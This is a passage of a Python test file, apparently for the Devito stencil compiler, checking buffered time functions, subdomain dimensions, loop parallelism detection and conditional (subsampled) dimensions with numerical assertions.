        assert np.allclose(f.data, 1)
        # g looped indices 0 to 3, rest is still 0
        assert np.allclose(g.data[0:4], 1)
        assert np.allclose(g.data[4:], 0)

    def test_multi_buffer_long_time(self):
        # Run long enough (time_M=20) that the 7-slot buffer wraps around.
        grid = Grid((3, 3))
        time = grid.time_dim
        f = TimeFunction(name="f", grid=grid)
        g = TimeFunction(name="g", grid=grid, save=Buffer(7))

        op = Operator([Eq(f.forward, time), Eq(g, time+1)])
        op(time_M=20)
        # f[0] is time=19, f[1] is time=20
        assert np.allclose(f.data[0], 19)
        assert np.allclose(f.data[1], 20)
        # g is time 15 to 21 (loop twice the 7 buffer then 15->21)
        for i in range(7):
            assert np.allclose(g.data[i], 14+i+1)


class TestSubDimension(object):

    @pytest.mark.parametrize('opt', opts_tiling)
    def test_interior(self, opt):
        """
        Tests application of an Operator consisting of a single equation
        over the ``interior`` subdomain.
        """
        grid = Grid(shape=(4, 4, 4))
        x, y, z = grid.dimensions

        interior = grid.interior

        u = TimeFunction(name='u', grid=grid)

        eqn = [Eq(u.forward, u + 2, subdomain=interior)]

        op = Operator(eqn, opt=opt)
        op.apply(time_M=2)
        # Interior incremented by 2 on each of the 3 timesteps; boundary untouched
        assert np.all(u.data[1, 1:-1, 1:-1, 1:-1] == 6.)
        assert np.all(u.data[1, :, 0] == 0.)
        assert np.all(u.data[1, :, -1] == 0.)
        assert np.all(u.data[1, :, :, 0] == 0.)
        assert np.all(u.data[1, :, :, -1] == 0.)

    def test_domain_vs_interior(self):
        """
        Tests application of an Operator consisting of two equations, one
        over the whole domain (default), and one over the ``interior`` subdomain.
        """
        grid = Grid(shape=(4, 4, 4))
        x, y, z = grid.dimensions
        t = grid.stepping_dim  # noqa

        interior = grid.interior

        u = TimeFunction(name='u', grid=grid)  # noqa
        eqs = [Eq(u.forward, u + 1),
               Eq(u.forward, u.forward + 2, subdomain=interior)]

        op = Operator(eqs, opt='noop')
        # The two equations iterate over different regions, hence two trees
        trees = retrieve_iteration_tree(op)
        assert len(trees) == 2

        op.apply(time_M=1)
        assert np.all(u.data[1, 0, :, :] == 1)
        assert np.all(u.data[1, -1, :, :] == 1)
        assert np.all(u.data[1, :, 0, :] == 1)
        assert np.all(u.data[1, :, -1, :] == 1)
        assert np.all(u.data[1, :, :, 0] == 1)
        assert np.all(u.data[1, :, :, -1] == 1)
        assert np.all(u.data[1, 1:3, 1:3, 1:3] == 3)

    @pytest.mark.parametrize('opt', opts_tiling)
    def test_subdim_middle(self, opt):
        """
        Tests that instantiating SubDimensions using the classmethod
        constructors works correctly.
        """
        grid = Grid(shape=(4, 4, 4))
        x, y, z = grid.dimensions
        t = grid.stepping_dim  # noqa

        u = TimeFunction(name='u', grid=grid)  # noqa
        xi = SubDimension.middle(name='xi', parent=x,
                                 thickness_left=1,
                                 thickness_right=1)
        eqs = [Eq(u.forward, u + 1)]
        eqs = [e.subs(x, xi) for e in eqs]

        op = Operator(eqs, opt=opt)

        u.data[:] = 1.0
        op.apply(time_M=1)
        # Only the middle of the x dimension gets updated
        assert np.all(u.data[1, 0, :, :] == 1)
        assert np.all(u.data[1, -1, :, :] == 1)
        assert np.all(u.data[1, 1:3, :, :] == 2)

    def test_symbolic_size(self):
        """Check the symbolic size of all possible SubDimensions is as expected."""
        grid = Grid(shape=(4,))
        x, = grid.dimensions
        thickness = 4

        xleft = SubDimension.left(name='xleft', parent=x, thickness=thickness)
        assert xleft.symbolic_size == xleft.thickness.left[0]

        xi = SubDimension.middle(name='xi', parent=x,
                                 thickness_left=thickness, thickness_right=thickness)
        assert xi.symbolic_size == (x.symbolic_max - x.symbolic_min -
                                    xi.thickness.left[0] - xi.thickness.right[0] + 1)

        xright = SubDimension.right(name='xright', parent=x, thickness=thickness)
        assert xright.symbolic_size == xright.thickness.right[0]

    @pytest.mark.parametrize('opt', opts_tiling)
    def test_bcs(self, opt):
        """
        Tests application of an Operator consisting of multiple equations
        defined over different sub-regions, explicitly created through the
        use of SubDimensions.
        """
        grid = Grid(shape=(20, 20))
        x, y = grid.dimensions
        t = grid.stepping_dim
        thickness = 4

        u = TimeFunction(name='u', save=None, grid=grid, space_order=0, time_order=1)

        xleft = SubDimension.left(name='xleft', parent=x, thickness=thickness)
        xi = SubDimension.middle(name='xi', parent=x,
                                 thickness_left=thickness, thickness_right=thickness)
        xright = SubDimension.right(name='xright', parent=x, thickness=thickness)

        yi = SubDimension.middle(name='yi', parent=y,
                                 thickness_left=thickness, thickness_right=thickness)

        t_in_centre = Eq(u[t+1, xi, yi], 1)
        leftbc = Eq(u[t+1, xleft, yi], u[t+1, xleft+1, yi] + 1)
        rightbc = Eq(u[t+1, xright, yi], u[t+1, xright-1, yi] + 1)

        op = Operator([t_in_centre, leftbc, rightbc], opt=opt)

        op.apply(time_m=1, time_M=1)

        assert np.all(u.data[0, :, 0:thickness] == 0.)
        assert np.all(u.data[0, :, -thickness:] == 0.)
        # BC values grow towards the boundary as they chain off the centre value
        assert all(np.all(u.data[0, i, thickness:-thickness] == (thickness+1-i))
                   for i in range(thickness))
        assert all(np.all(u.data[0, -i, thickness:-thickness] == (thickness+2-i))
                   for i in range(1, thickness + 1))
        assert np.all(u.data[0, thickness:-thickness, thickness:-thickness] == 1.)

    def test_flow_detection_interior(self):
        """
        Test detection of flow directions when SubDimensions are used
        (in this test they are induced by the ``interior`` subdomain).

        Stencil uses values at new timestep as well as those at previous ones
        This forces an evaluation order onto x.
        Weights are:

               x=0     x=1     x=2     x=3
         t=N    2    ---3
                v   /
         t=N+1  o--+----4

        Flow dependency should traverse x in the negative direction

               x=2     x=3     x=4     x=5      x=6
        t=0             0   --- 0     -- 1    -- 0
                        v  /    v    /   v   /
        t=1            44 -+--- 11 -+--- 2--+ -- 0
        """
        grid = Grid(shape=(10, 10))
        x, y = grid.dimensions

        interior = grid.interior

        u = TimeFunction(name='u', grid=grid, save=10, time_order=1, space_order=0)

        step = Eq(u.forward, 2*u
                  + 3*u.subs(x, x+x.spacing)
                  + 4*u.forward.subs(x, x+x.spacing),
                  subdomain=interior)
        op = Operator(step)

        u.data[0, 5, 5] = 1.0
        op.apply(time_M=0)
        assert u.data[1, 5, 5] == 2
        assert u.data[1, 4, 5] == 11
        assert u.data[1, 3, 5] == 44
        assert u.data[1, 2, 5] == 4*44
        assert u.data[1, 1, 5] == 4*4*44

        # This point isn't updated because of the `interior` selection
        assert u.data[1, 0, 5] == 0

        assert np.all(u.data[1, 6:, :] == 0)
        assert np.all(u.data[1, :, 0:5] == 0)
        assert np.all(u.data[1, :, 6:] == 0)

    @pytest.mark.parametrize('exprs,expected,', [
        # Carried dependence in both /t/ and /x/
        (['Eq(u[t+1, x, y], u[t+1, x-1, y] + u[t, x, y])'], 'y'),
        (['Eq(u[t+1, x, y], u[t+1, x-1, y] + u[t, x, y], subdomain=interior)'], 'i0y'),
        # Carried dependence in both /t/ and /y/
        (['Eq(u[t+1, x, y], u[t+1, x, y-1] + u[t, x, y])'], 'x'),
        (['Eq(u[t+1, x, y], u[t+1, x, y-1] + u[t, x, y], subdomain=interior)'], 'i0x'),
        # Carried dependence in /y/, leading to separate /y/ loops, one
        # going forward, the other backward
        (['Eq(u[t+1, x, y], u[t+1, x, y-1] + u[t, x, y], subdomain=interior)',
          'Eq(u[t+1, x, y], u[t+1, x, y+1] + u[t, x, y], subdomain=interior)'], 'i0x'),
    ])
    def test_iteration_property_parallel(self, exprs, expected):
        """Tests detection of sequential and parallel Iterations when applying
        equations over different subdomains."""
        grid = Grid(shape=(20, 20))
        x, y = grid.dimensions  # noqa
        t = grid.time_dim  # noqa

        interior = grid.interior  # noqa

        u = TimeFunction(name='u', grid=grid, save=10, time_order=1)  # noqa

        # List comprehension would need explicit locals/globals mappings to eval
        for i, e in enumerate(list(exprs)):
            exprs[i] = eval(e)

        op = Operator(exprs, opt='noop')
        iterations = FindNodes(Iteration).visit(op)
        assert all(i.is_Sequential for i in iterations if i.dim.name != expected)
        assert all(i.is_Parallel for i in iterations if i.dim.name == expected)

    @skipif(['device'])
    @pytest.mark.parametrize('exprs,expected,', [
        # All parallel, the innermost Iteration gets vectorized
        (['Eq(u[time, x, yleft], u[time, x, yleft] + 1.)'], ['yleft']),
        # All outers are parallel, carried dependence in `yleft`, so the middle
        # Iteration over `x` gets vectorized
        (['Eq(u[time, x, yleft], u[time, x, yleft+1] + 1.)'], ['x']),
        # Only the middle Iteration is parallel, so no vectorization (the Iteration
        # is left non-vectorised for OpenMP parallelism)
        (['Eq(u[time+1, x, yleft], u[time, x, yleft+1] + u[time+1, x, yleft+1])'], [])
    ])
    def test_iteration_property_vector(self, exprs, expected):
        """Tests detection of vector Iterations when using subdimensions."""
        grid = Grid(shape=(20, 20))
        x, y = grid.dimensions  # noqa
        time = grid.time_dim  # noqa

        # The leftmost 10 elements
        yleft = SubDimension.left(name='yleft', parent=y, thickness=10) # noqa

        u = TimeFunction(name='u', grid=grid, save=10, time_order=0, space_order=1)  # noqa

        # List comprehension would need explicit locals/globals mappings to eval
        for i, e in enumerate(list(exprs)):
            exprs[i] = eval(e)

        op = Operator(exprs, opt='simd')
        iterations = FindNodes(Iteration).visit(op)
        vectorized = [i.dim.name for i in iterations if i.is_Vectorized]
        assert set(vectorized) == set(expected)

    @pytest.mark.parametrize('opt', opts_tiling)
    def test_subdimmiddle_parallel(self, opt):
        """
        Tests application of an Operator consisting of a subdimension
        defined over different sub-regions, explicitly created through the
        use of SubDimensions.
        """
        grid = Grid(shape=(20, 20))
        x, y = grid.dimensions
        t = grid.stepping_dim
        thickness = 4

        u = TimeFunction(name='u', save=None, grid=grid, space_order=0, time_order=1)

        xi = SubDimension.middle(name='xi', parent=x,
                                 thickness_left=thickness, thickness_right=thickness)

        yi = SubDimension.middle(name='yi', parent=y,
                                 thickness_left=thickness, thickness_right=thickness)

        # a 5 point stencil that can be computed in parallel
        centre = Eq(u[t+1, xi, yi], u[t, xi, yi] + u[t, xi-1, yi]
                                    + u[t, xi+1, yi] + u[t, xi, yi-1] + u[t, xi, yi+1])

        u.data[0, 10, 10] = 1.0

        op = Operator([centre], opt=opt)

        iterations = FindNodes(Iteration).visit(op)
        assert all(i.is_Affine and i.is_Parallel for i in iterations if i.dim in [xi, yi])

        op.apply(time_m=0, time_M=0)

        assert np.all(u.data[1, 9:12, 10] == 1.0)
        assert np.all(u.data[1, 10, 9:12] == 1.0)

        # Other than those, it should all be 0
        u.data[1, 9:12, 10] = 0.0
        u.data[1, 10, 9:12] = 0.0
        assert np.all(u.data[1, :] == 0)

    def test_subdimleft_parallel(self):
        """
        Tests application of an Operator consisting of a subdimension
        defined over different sub-regions, explicitly created through the
        use of SubDimensions.

        This tests that flow direction is not being automatically inferred
        from whether the subdimension is on the left or right boundary.
        """
        grid = Grid(shape=(20, 20))
        x, y = grid.dimensions
        t = grid.stepping_dim
        thickness = 4

        u = TimeFunction(name='u', save=None, grid=grid, space_order=0, time_order=1)

        xl = SubDimension.left(name='xl', parent=x, thickness=thickness)

        yi = SubDimension.middle(name='yi', parent=y,
                                 thickness_left=thickness, thickness_right=thickness)

        # Can be done in parallel
        eq = Eq(u[t+1, xl, yi], u[t, xl, yi] + 1)

        op = Operator([eq])

        iterations = FindNodes(Iteration).visit(op)
        assert all(i.is_Affine and i.is_Parallel for i in iterations if i.dim in [xl, yi])

        op.apply(time_m=0, time_M=0)

        assert np.all(u.data[1, 0:thickness, 0:thickness] == 0)
        assert np.all(u.data[1, 0:thickness, -thickness:] == 0)
        assert np.all(u.data[1, 0:thickness, thickness:-thickness] == 1)
        assert np.all(u.data[1, thickness+1:, :] == 0)

    def test_subdimmiddle_notparallel(self):
        """
        Tests application of an Operator consisting of a subdimension
        defined over different sub-regions, explicitly created through the
        use of SubDimensions.

        Different from ``test_subdimmiddle_parallel`` because an interior
        dimension cannot be evaluated in parallel.
        """
        grid = Grid(shape=(20, 20))
        x, y = grid.dimensions
        t = grid.stepping_dim
        thickness = 4

        u = TimeFunction(name='u', save=None, grid=grid, space_order=0, time_order=1)

        xi = SubDimension.middle(name='xi', parent=x,
                                 thickness_left=thickness, thickness_right=thickness)

        yi = SubDimension.middle(name='yi', parent=y,
                                 thickness_left=thickness, thickness_right=thickness)

        # flow dependencies in x and y which should force serial execution
        # in reverse direction
        centre = Eq(u[t+1, xi, yi], u[t, xi, yi] + u[t+1, xi+1, yi+1])
        u.data[0, 10, 10] = 1.0

        op = Operator([centre])

        iterations = FindNodes(Iteration).visit(op)
        assert all(i.is_Affine and i.is_Sequential for i in iterations if i.dim == xi)
        assert all(i.is_Affine and i.is_Parallel for i in iterations if i.dim == yi)

        op.apply(time_m=0, time_M=0)

        # The seed point propagates down the diagonal towards the interior edge
        for i in range(4, 11):
            assert u.data[1, i, i] == 1.0
            u.data[1, i, i] = 0.0

        assert np.all(u.data[1, :] == 0)

    def test_subdimleft_notparallel(self):
        """
        Tests application of an Operator consisting of a subdimension
        defined over different sub-regions, explicitly created through the
        use of SubDimensions.

        This tests that flow direction is not being automatically inferred
        from whether the subdimension is on the left or right boundary.
        """
        grid = Grid(shape=(20, 20))
        x, y = grid.dimensions
        t = grid.stepping_dim
        thickness = 4

        u = TimeFunction(name='u', save=None, grid=grid, space_order=1, time_order=0)

        xl = SubDimension.left(name='xl', parent=x, thickness=thickness)

        yi = SubDimension.middle(name='yi', parent=y,
                                 thickness_left=thickness, thickness_right=thickness)

        # Flows inward (i.e. forward) rather than outward
        eq = Eq(u[t+1, xl, yi], u[t+1, xl-1, yi] + 1)

        op = Operator([eq])

        iterations = FindNodes(Iteration).visit(op)
        assert all(i.is_Affine and i.is_Sequential for i in iterations if i.dim == xl)
        assert all(i.is_Affine and i.is_Parallel for i in iterations if i.dim == yi)

        op.apply(time_m=1, time_M=1)

        assert all(np.all(u.data[0, :thickness, thickness+i] == [1, 2, 3, 4])
                   for i in range(12))
        assert np.all(u.data[0, thickness:] == 0)
        assert np.all(u.data[0, :, thickness+12:] == 0)

    def test_subdim_fd(self):
        """
        Test that the FD shortcuts are handled correctly with SubDimensions
        """
        grid = Grid(shape=(20, 20))
        x, y = grid.dimensions

        u = TimeFunction(name='u', save=None, grid=grid, space_order=1, time_order=1)
        u.data[:] = 2.

        # Update the interior only; boundary values must remain untouched
        eq = [Eq(u.forward, u.dx + u.dy, subdomain=grid.interior)]

        op = Operator(eq)

        op.apply(time_M=0)

        assert np.all(u.data[1, -1, :] == 2.)
        assert np.all(u.data[1, :, 0] == 2.)
        assert np.all(u.data[1, :, -1] == 2.)
        assert np.all(u.data[1, 0, :] == 2.)
        assert np.all(u.data[1, 1:18, 1:18] == 0.)

    def test_arrays_defined_over_subdims(self):
        """
        Check code generation when an Array uses a SubDimension.
        """
        grid = Grid(shape=(3,))
        x, = grid.dimensions
        xi, = grid.interior.dimensions

        f = Function(name='f', grid=grid)
        a = Array(name='a', dimensions=(xi,), dtype=grid.dtype)
        op = Operator([Eq(a[xi], 1), Eq(f, f + a[xi + 1], subdomain=grid.interior)],
                      openmp=False)
        assert len(op.parameters) == 6
        # neither `x_size` nor `xi_size` are expected here
        assert not any(i.name in ('x_size', 'xi_size') for i in op.parameters)
        # Try running it -- regardless of what it will produce, this should run
        # ie, this checks this error isn't raised:
        # "ValueError: No value found for parameter xi_size"
        op()

    @pytest.mark.parametrize('opt', opts_tiling)
    def test_expandingbox_like(self, opt):
        """
        Make sure SubDimensions aren't an obstacle to expanding boxes.
        """
        grid = Grid(shape=(8, 8))
        x, y = grid.dimensions

        u = TimeFunction(name='u', grid=grid)
        xi = SubDimension.middle(name='xi', parent=x, thickness_left=2, thickness_right=2)
        yi = SubDimension.middle(name='yi', parent=y, thickness_left=2, thickness_right=2)

        eqn = Eq(u.forward, u + 1)
        eqn = eqn.subs({x: xi, y: yi})

        op = Operator(eqn, opt=opt)

        # Zero thicknesses: the "box" is entirely determined by the x/y bounds
        op.apply(time=3, x_m=2, x_M=5, y_m=2, y_M=5,
                 xi_ltkn=0, xi_rtkn=0, yi_ltkn=0, yi_rtkn=0)

        assert np.all(u.data[0, 2:-2, 2:-2] == 4.)
        assert np.all(u.data[1, 2:-2, 2:-2] == 3.)
        assert np.all(u.data[:, :2] == 0.)
        assert np.all(u.data[:, -2:] == 0.)
        assert np.all(u.data[:, :, :2] == 0.)
        assert np.all(u.data[:, :, -2:] == 0.)


class TestConditionalDimension(object):

    """
    A collection of tests to check the correct functioning of ConditionalDimensions.
    """

    def test_basic(self):
        """Subsampled saving of a TimeFunction via a factor-based
        ConditionalDimension."""
        nt = 19
        grid = Grid(shape=(11, 11))
        time = grid.time_dim

        u = TimeFunction(name='u', grid=grid)
        assert grid.stepping_dim in u.indices

        u2 = TimeFunction(name='u2', grid=grid, save=nt)
        assert time in u2.indices

        factor = 4
        nsaved = (nt + factor - 1) // factor
        time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
        usave = TimeFunction(name='usave', grid=grid, save=nsaved,
                             time_dim=time_subsampled)
        assert time_subsampled in usave.indices

        op = Operator([Eq(u.forward, u + 1.), Eq(u2.forward, u2 + 1.),
                       Eq(usave, u)])
        op.apply(t_M=nt-2)
        # `u` wraps modulo 3 (default time buffering)
        assert np.allclose(u.data[(nt-1) % 3], nt-1)
        # `u2` keeps every timestep
        assert all(np.allclose(u2.data[i], i) for i in range(nt))
        # `usave` keeps every `factor`-th timestep
        assert all(np.allclose(usave.data[i], i*factor) for i in range(nsaved))

    def test_basic_shuffles(self):
        """
        Like ``test_basic``, but with different equation orderings. Nevertheless,
        we assert against the same exact values as in ``test_basic``, since we
        save `u`, not `u.forward`.
        """
        nt = 19
        grid = Grid(shape=(11, 11))
        time = grid.time_dim

        u = TimeFunction(name='u', grid=grid)

        u2 = TimeFunction(name='u2', grid=grid, save=nt)

        factor = 4
        time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
        usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
                             time_dim=time_subsampled)

        def run_and_check(eqns):
            # Build/run the Operator, then verify the same values as test_basic
            Operator(eqns).apply(t_M=nt-2)
            assert np.allclose(u.data[(nt-1) % 3], nt-1)
            assert all(np.allclose(u2.data[i], i) for i in range(nt))
            assert all(np.allclose(usave.data[i], i*factor)
                       for i in range((nt+factor-1)//factor))

        # Shuffle 1: the saving Eq comes first
        run_and_check([Eq(usave, u), Eq(u.forward, u + 1.), Eq(u2.forward, u2 + 1.)])

        # Shuffle 2: the saving Eq sits between the two updates
        usave.data[:] = 0.
        u.data[:] = 0.
        u2.data[:] = 0.
        run_and_check([Eq(u.forward, u + 1.), Eq(usave, u), Eq(u2.forward, u2 + 1.)])

    @pytest.mark.parametrize('opt', opts_tiling)
    def test_spacial_subsampling(self, opt):
        """
        Test conditional dimension for the spatial ones.
        This test saves u every two grid points :
        u2[x, y] = u[2*x, 2*y]
        """
        nt = 19
        grid = Grid(shape=(11, 11))
        time = grid.time_dim

        u = TimeFunction(name='u', grid=grid, save=nt)
        assert(grid.time_dim in u.indices)

        # Create subsampled spatial dimensions and a matching coarser grid
        dims = tuple([ConditionalDimension(d.name+'sub', parent=d, factor=2)
                      for d in u.grid.dimensions])
        grid2 = Grid((6, 6), dimensions=dims, time_dimension=time)
        u2 = TimeFunction(name='u2', grid=grid2, save=nt)
        assert(time in u2.indices)

        eqns = [Eq(u.forward, u + 1.), Eq(u2, u)]
        op = Operator(eqns, opt=opt)
        op.apply(time_M=nt-2)
        # Verify that u2[x,y]= u[2*x, 2*y]
        assert np.allclose(u.data[:-1, 0::2, 0::2], u2.data[:-1, :, :])

    def test_time_subsampling_fd(self):
        """The FD stencil of a subsampled TimeFunction must be indexed with
        the ConditionalDimension, not the parent time dimension."""
        nt = 19
        grid = Grid(shape=(11, 11))
        x, y = grid.dimensions
        time = grid.time_dim

        factor = 4
        time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
        usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
                             time_dim=time_subsampled, time_order=2)

        dt2_terms = [indexify(f) for f in retrieve_functions(usave.dt2.evaluate)]
        assert dt2_terms == [usave[time_subsampled - 1, x, y],
                             usave[time_subsampled + 1, x, y],
                             usave[time_subsampled, x, y]]

    def test_issue_1592(self):
        # Regression test: lowering the write index of a subsampled
        # TimeFunction must produce an integer division of the parent `time`
        grid = Grid(shape=(11, 11))
        time = grid.time_dim
        time_sub = ConditionalDimension('t_sub', parent=time, factor=2)
        v = TimeFunction(name="v", grid=grid, space_order=4, time_dim=time_sub, save=5)
        w = Function(name="w", grid=grid, space_order=4)
        Operator(Eq(w, v.dx))(time=6)
        op = Operator(Eq(v.forward, v.dx))
        op.apply(time=6)
        exprs = FindNodes(Expression).visit(op)
        # The last expression writes `v` at index time/2 + 1
        assert exprs[-1].expr.lhs.indices[0] == IntDiv(time, 2) + 1

    def test_subsampled_fd(self):
        """
        Test that the FD shortcuts are handled correctly with ConditionalDimensions
        """
        grid = Grid(shape=(11, 11))
        time = grid.time_dim
        # Create subsampled spatial dimensions and a matching coarser grid
        dims = tuple([ConditionalDimension(d.name+'sub', parent=d, factor=2)
                      for d in grid.dimensions])
        grid2 = Grid((6, 6), dimensions=dims, time_dimension=time)
        u2 = TimeFunction(name='u2', grid=grid2, space_order=2, time_order=1)
        u2.data.fill(2.)
        eqns = [Eq(u2.forward, u2.dx + u2.dy)]
        op = Operator(eqns)
        op.apply(time_M=0, x_M=11, y_M=11)
        # Verify that u2 contains subsampled fd values
        assert np.all(u2.data[0, :, :] == 2.)
        assert np.all(u2.data[1, 0, 0] == 0.)
        assert np.all(u2.data[1, -1, -1] == -20.)
        assert np.all(u2.data[1, 0, -1] == -10.)
        assert np.all(u2.data[1, -1, 0] == -10.)
        assert np.all(u2.data[1, 1:-1, 0] == 0.)
        assert np.all(u2.data[1, 0, 1:-1] == 0.)
        assert np.all(u2.data[1, 1:-1, -1] == -10.)
        assert np.all(u2.data[1, -1, 1:-1] == -10.)
        assert np.all(u2.data[1, 1:4, 1:4] == 0.)

    # This test generates an openmp loop form which makes older gccs upset
    @switchconfig(openmp=False)
    def test_nothing_in_negative(self):
        """Test the case where when the condition is false, there is nothing to do."""
        nt = 4
        grid = Grid(shape=(11, 11))
        time = grid.time_dim

        u = TimeFunction(name='u', save=nt, grid=grid)
        assert grid.time_dim in u.indices

        factor = 4
        time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
        usave = TimeFunction(name='usave', grid=grid, save=(nt+factor-1)//factor,
                             time_dim=time_subsampled)
        assert time_subsampled in usave.indices

        op = Operator([Eq(usave, u)])

        u.data[:] = 1.0
        usave.data[:] = 0.0
        # time=1 is not a multiple of `factor`: the condition never fires
        op.apply(time_m=1, time_M=1)
        assert np.allclose(usave.data, 0.0)

        # time=0 is a multiple of `factor`: the snapshot is taken
        op.apply(time_m=0, time_M=0)
        assert np.allclose(usave.data, 1.0)

    def test_laplace(self):
        """Snapshotting (via a factor-2 ConditionalDimension) combined with a
        Laplace-like update written with explicit indices."""
        grid = Grid(shape=(20, 20, 20))
        x, y, z = grid.dimensions
        time = grid.time_dim
        t = grid.stepping_dim
        tsave = ConditionalDimension(name='tsave', parent=time, factor=2)

        u = TimeFunction(name='u', grid=grid, save=None, time_order=2)
        usave = TimeFunction(name='usave', grid=grid, time_dim=tsave,
                             time_order=0, space_order=0)

        steps = []
        # save of snapshot
        steps.append(Eq(usave, u))
        # standard laplace-like thing
        steps.append(Eq(u[t+1, x, y, z],
                        u[t, x, y, z] - u[t-1, x, y, z]
                        + u[t, x-1, y, z] + u[t, x+1, y, z]
                        + u[t, x, y-1, z] + u[t, x, y+1, z]
                        + u[t, x, y, z-1] + u[t, x, y, z+1]))

        op = Operator(steps)

        u.data[:] = 0.0
        u.data[0, 10, 10, 10] = 1.0
        op.apply(time_m=0, time_M=0)
        # One step spreads the unit spike to its 6 neighbours plus itself
        assert np.sum(u.data[0, :, :, :]) == 1.0
        assert np.sum(u.data[1, :, :, :]) == 7.0
        assert np.all(usave.data[0, :, :, :] == u.data[0, :, :, :])

    def test_as_expr(self):
        """A ConditionalDimension may appear as a plain symbol in the
        right-hand side of the saved expression."""
        nt = 19
        grid = Grid(shape=(11, 11))
        time = grid.time_dim

        u = TimeFunction(name='u', grid=grid)
        assert grid.stepping_dim in u.indices

        u2 = TimeFunction(name='u2', grid=grid, save=nt)
        assert time in u2.indices

        factor = 4
        nsaved = (nt + factor - 1) // factor
        time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
        usave = TimeFunction(name='usave', grid=grid, save=nsaved,
                             time_dim=time_subsampled)
        assert time_subsampled in usave.indices

        op = Operator([Eq(u.forward, u + 1.), Eq(u2.forward, u2 + 1.),
                       Eq(usave, time_subsampled * u)])
        op.apply(t=nt-2)
        assert np.allclose(u.data[(nt-1) % 3], nt-1)
        assert all(np.allclose(u2.data[i], i) for i in range(nt))
        # Each snapshot is scaled by its own subsampled index
        assert all(np.allclose(usave.data[i], i*factor*i) for i in range(nsaved))

    def test_shifted(self):
        """Saving into `usave` with the subsampled index shifted by a runtime
        Constant, so the save window can start at an arbitrary offset."""
        nt = 19
        grid = Grid(shape=(11, 11))
        time = grid.time_dim

        u = TimeFunction(name='u', grid=grid)
        assert(grid.stepping_dim in u.indices)

        u2 = TimeFunction(name='u2', grid=grid, save=nt)
        assert(time in u2.indices)

        factor = 4
        time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)
        usave = TimeFunction(name='usave', grid=grid, save=2, time_dim=time_subsampled)
        assert(time_subsampled in usave.indices)

        # Runtime-adjustable shift applied to the subsampled write index
        t_sub_shift = Constant(name='t_sub_shift', dtype=np.int32)

        eqns = [Eq(u.forward, u + 1.), Eq(u2.forward, u2 + 1.),
                Eq(usave.subs(time_subsampled, time_subsampled - t_sub_shift), u)]
        op = Operator(eqns)

        # Starting at time_m=10, so time_subsampled - t_sub_shift is in range
        op.apply(time_m=10, time_M=nt-2, t_sub_shift=3)
        assert np.all(np.allclose(u.data[0], 8))
        assert np.all([np.allclose(u2.data[i], i - 10) for i in range(10, nt)])
        assert np.all([np.allclose(usave.data[i], 2+i*factor) for i in range(2)])

    def test_no_index(self):
        """Test behaviour when the ConditionalDimension is used as a symbol in
        an expression."""
        nt = 19
        grid = Grid(shape=(11, 11))
        time = grid.time_dim

        u = TimeFunction(name='u', grid=grid)
        assert(grid.stepping_dim in u.indices)

        v = Function(name='v', grid=grid)

        factor = 4
        time_subsampled = ConditionalDimension('t_sub', parent=time, factor=factor)

        eqns = [Eq(u.forward, u + 1), Eq(v, v + u*u*time_subsampled)]
        op = Operator(eqns)
        op.apply(t_M=nt-2)
        assert np.all(np.allclose(u.data[(nt-1) % 3], nt-1))
        # Expected result:
        # v = u[0]**2 * 0 + u[4]**2 * 1 + u[8]**2 * 2 + u[12]**2 * 3 + u[16]**2 * 4
        # with u[t] = t
        # v = 16 * 1 + 64 * 2 + 144 * 3 + 256 * 4 = 1600
        assert np.all(np.allclose(v.data, 1600))

    def test_no_index_sparse(self):
        """Test behaviour when the ConditionalDimension is used as a symbol in
        an expression over sparse data objects."""
        grid = Grid(shape=(4, 4), extent=(3.0, 3.0))
        time = grid.time_dim

        f = TimeFunction(name='f', grid=grid, save=1)
        f.data[:] = 0.

        coordinates = [(0.5, 0.5), (0.5, 2.5), (2.5, 0.5), (2.5, 2.5)]
        sf = SparseFunction(name='sf', grid=grid, npoint=4, coordinates=coordinates)
        sf.data[:] = 1.
        sd = sf.dimensions[sf._sparse_position]

        # We want to write to `f` through `sf` so that we obtain the
        # following 4x4 grid (the '*' show the position of the sparse points)
        # We do that by emulating an injection
        #
        # 0 --- 0 --- 0 --- 0
        # |  *  |     |  *  |
        # 0 --- 1 --- 1 --- 0
        # |     |     |     |
        # 0 --- 1 --- 1 --- 0
        # |  *  |     |  *  |
        # 0 --- 0 --- 0 --- 0

        radius = 1
        indices = [(i, i+radius) for i in sf._coordinate_indices]
        bounds = [i.symbolic_size - radius for i in grid.dimensions]

        eqs = []
        for e, i in enumerate(product(*indices)):
            # Guard each write so that out-of-domain grid points are skipped
            args = [j > 0 for j in i]
            args.extend([j < k for j, k in zip(i, bounds)])
            condition = And(*args, evaluate=False)
            cd = ConditionalDimension('sfc%d' % e, parent=sd, condition=condition)
            index = [time] + list(i)
            eqs.append(Eq(f[index], f[index] + sf[cd]))

        op = Operator(eqs)
        op.apply(time=0)

        assert np.all(f.data[0, 1:-1, 1:-1] == 1.)
        assert np.all(f.data[0, 0] == 0.)
        assert np.all(f.data[0, -1] == 0.)
        assert np.all(f.data[0, :, 0] == 0.)
        assert np.all(f.data[0, :, -1] == 0.)

    def test_symbolic_factor(self):
        """
        Test ConditionalDimension with symbolic factor (provided as a Constant).
        """
        g = Grid(shape=(4, 4, 4))

        u = TimeFunction(name='u', grid=g, time_order=0)

        fact = Constant(name='fact', dtype=np.int32, value=4)
        tsub = ConditionalDimension(name='tsub', parent=g.time_dim, factor=fact)
        usave = TimeFunction(name='usave', grid=g, time_dim=tsub, save=4)

        op = Operator([Eq(u, u + 1), Eq(usave, u)])

        # Default value of `fact` (4): snapshots at times 0 and 4
        op.apply(time=7)
        assert np.all(usave.data[0] == 1)
        assert np.all(usave.data[1] == 5)

        # Override `fact` at apply-time: a snapshot every 2 timesteps
        u.data[:] = 0.
        op.apply(time=7, fact=2)
        for snap, expected in enumerate([1, 3, 5, 7]):
            assert np.all(usave.data[snap] == expected)

    def test_implicit_dims(self):
        """
        Use a ConditionalDimension purely as an implicit dimension of an Eq.
        """
        # Build an Operator that produces a vector of increasing integers,
        # saturating once `stop_value` is reached
        shape = (50,)
        stop_value = 20

        time = Dimension(name='time')
        f = TimeFunction(name='f', shape=shape, dimensions=[time])

